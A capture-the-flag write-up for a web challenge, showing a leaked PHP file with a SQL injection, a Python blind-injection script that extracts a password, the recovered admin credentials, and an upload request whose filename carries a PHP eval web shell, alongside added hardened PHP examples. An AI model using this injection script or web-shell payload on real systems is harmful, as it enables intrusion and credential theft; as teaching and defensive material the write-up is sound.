[Finals] Easyweb
Backup file disclosure: image.php.bak contains the following.

```php
<?php
include "config.php";
// Both parameters come straight from the query string, with defaults
$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";
// Stage 1: prefix ' " \ with a backslash
$id=addslashes($id);
$path=addslashes($path);
// Stage 2: delete these four tokens from the already-escaped string
$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);
// The filtered values are still interpolated directly into the SQL
$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);
$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);
```
This is an obvious SQL injection. The filter first prefixes every `'`, `"` and `\` in the string with a backslash (addslashes), and then replaces all occurrences of the four tokens `\0`, `%00`, `\'` and `'` with the empty string.

Here the layered filtering is exactly what creates the bug: passing in `\0` gets a backslash added, giving `\\0`; the replacement then strips the `\0` and leaves a lone `\`, which escapes the closing quote that follows the interpolated value. The statement becomes:

```sql
select * from images where id='\' or path='{$path}'
```
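As an added example (not part of the original write-up), the PHP below wraps the leaked filter chain in a function so the `\0` to `\` transformation can be traced stage by stage, and then shows the same lookup rewritten with an integer whitelist on `id`, a prepared statement, and a containment check before `readfile()`. The function names, the `images` directory and the `$con` connection are assumptions.

```php
<?php
// Added example, not part of the original write-up.
// Reproduces the filter chain from image.php.bak and contrasts it with a
// parameterised version of the same lookup.

// The leaked filter chain, unchanged, wrapped in a function so it can be traced.
function leakyFilter(string $value): string
{
    $value = addslashes($value);                                     // ' " \ get a backslash prefix
    return str_replace(array("\\0", "%00", "\\'", "'"), "", $value); // then these four tokens are deleted
}

// Stage-by-stage view of what happens to a given input.
function traceFilter(string $value): array
{
    $afterAddslashes = addslashes($value);
    $afterReplace    = str_replace(array("\\0", "%00", "\\'", "'"), "", $afterAddslashes);
    return ['input' => $value, 'addslashes' => $afterAddslashes, 'str_replace' => $afterReplace];
}

// Input "\0" (the two characters backslash, zero): addslashes doubles the
// backslash to "\\0", str_replace then deletes the trailing "\0" and a lone
// backslash remains. Prints input => \0, addslashes => \\0, str_replace => \
print_r(traceFilter("\\0"));

// That lone backslash is why the built query became
//   select * from images where id='\' or path='...'
// and the path parameter stopped being a quoted literal.

// Hardened lookup (assumed function name): integer whitelist on id, and a
// prepared statement so quoting is the driver's job, not string surgery.
function fetchImagePath(mysqli $con, string $id, string $path): ?string
{
    if (!ctype_digit($id)) {
        return null;                      // id must be a plain decimal number
    }
    $idInt = (int) $id;                   // bind_param needs a variable, not an expression
    $stmt = $con->prepare("SELECT path FROM images WHERE id = ? OR path = ?");
    $stmt->bind_param("is", $idInt, $path);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row['path'] ?? null;
}

// Serve the file only if it resolves to a regular file inside the images
// directory (assumed location), so a stored path can never point readfile()
// outside it.
function serveImage(string $relativePath, string $baseDir = __DIR__ . '/images'): bool
{
    $base = realpath($baseDir);
    $full = realpath($baseDir . '/' . $relativePath);
    if ($base === false || $full === false || !is_file($full)
        || strpos($full, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    header('Content-Type: image/jpeg');
    readfile($full);
    return true;
}
```

The point of `traceFilter()` is that each stage is individually reasonable and the composition is still wrong: any blacklist applied after an escaping step can undo the escaping. The prepared statement removes the need for either stage, and `ctype_digit()` rejects everything that is not a plain id before the database is involved at all.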
Blind injection:

```python
import requests

if __name__ == "__main__":
    result = ""
    for i in range(1, 256):
        # Binary search over printable ASCII for the i-th character
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            # Same query with the username column instead of the password:
            # url = f"http://4cbf7e65-8140-46e5-9290-d5b20b810fc9.node4.buuoj.cn/image.php?id=\\0&path=or id=if(ascii(substr((select username from users),{i},1))>{mid},1,0)%23"
            url = f"http://4cbf7e65-8140-46e5-9290-d5b20b810fc9.node4.buuoj.cn/image.php?id=\\0&path=or id=if(ascii(substr((select password from users),{i},1))>{mid},1,0)%23"
            response = requests.get(url)
            # The oracle: a JPEG (JFIF marker) comes back only when the condition is true
            if response.text.find("JFIF") != -1:
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
        result += chr(mid)
        print(result, end="\n")
```
username: admin
password: 34b554ef83fbe7e7e859
After logging in there is a file upload, which is fairly simple: since "php" is filtered, we bypass it with a short-tag filename.

```http
------WebKitFormBoundary7kJGMqV6oJpewWgp
Content-Disposition: form-data; name="file"; filename="<?= @eval($_POST['shell']);?>"
Content-Type: application/octet-stream

111
------WebKitFormBoundary7kJGMqV6oJpewWgp
Content-Disposition: form-data; name="submit"

Submit
------WebKitFormBoundary7kJGMqV6oJpewWgp--
```
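The upload was defeated because the check was a substring blacklist on the client-supplied filename, and that name was then reused. As an added example (not part of the original write-up or the challenge's own code), the handler below never lets the client name reach the filesystem or the HTML: it whitelists the extension, checks the file's real MIME type, and stores under a server-generated name. The upload directory, the `ALLOWED` map and the function names are assumptions.

```php
<?php
// Added example, not part of the original write-up.
// A hardened upload handler: the client filename is used only to pick an
// extension from a whitelist; everything else is decided server-side.

const UPLOAD_DIR = __DIR__ . '/uploads';   // assumed location; keep it outside the web root in practice
const ALLOWED = [                          // extension => MIME type the bytes must actually have
    'jpg' => 'image/jpeg',
    'png' => 'image/png',
    'gif' => 'image/gif',
];

// Returns a server-generated filename, or null if the upload must be rejected.
function safeUploadName(array $file): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    // Extension from the client name, lower-cased, whitelist only.
    // A name like "<?= ... ?>" has no allowed extension and is rejected here.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        return null;
    }
    // Content type from the bytes, not from the client's Content-Type header.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== ALLOWED[$ext]) {
        return null;
    }
    // Random server-side name: nothing the client typed is preserved.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Moves the file into UPLOAD_DIR under its safe name; returns that name or null.
function storeUpload(array $file): ?string
{
    $name = safeUploadName($file);
    if ($name === null) {
        return null;
    }
    if (!is_dir(UPLOAD_DIR) && !mkdir(UPLOAD_DIR, 0750, true)) {
        return null;
    }
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    return $name;
}

// Even a server-generated name is escaped when rendered, as a habit.
function renderLink(string $name): string
{
    return '<a href="/uploads/' . rawurlencode($name) . '">'
        . htmlspecialchars($name, ENT_QUOTES, 'UTF-8') . '</a>';
}

if (isset($_FILES['file'])) {
    $stored = storeUpload($_FILES['file']);
    echo $stored === null ? 'rejected' : renderLink($stored);
}
```

Two design choices matter here. The decision is a whitelist (allowed extensions and matching MIME types), not a blacklist on "php", so variants such as short tags, alternative extensions or case changes never need to be enumerated. And the stored name is generated, so a filename is never a vehicle for code regardless of where it is later displayed; pairing this with a server configuration that does not execute scripts from the upload directory closes the remaining path.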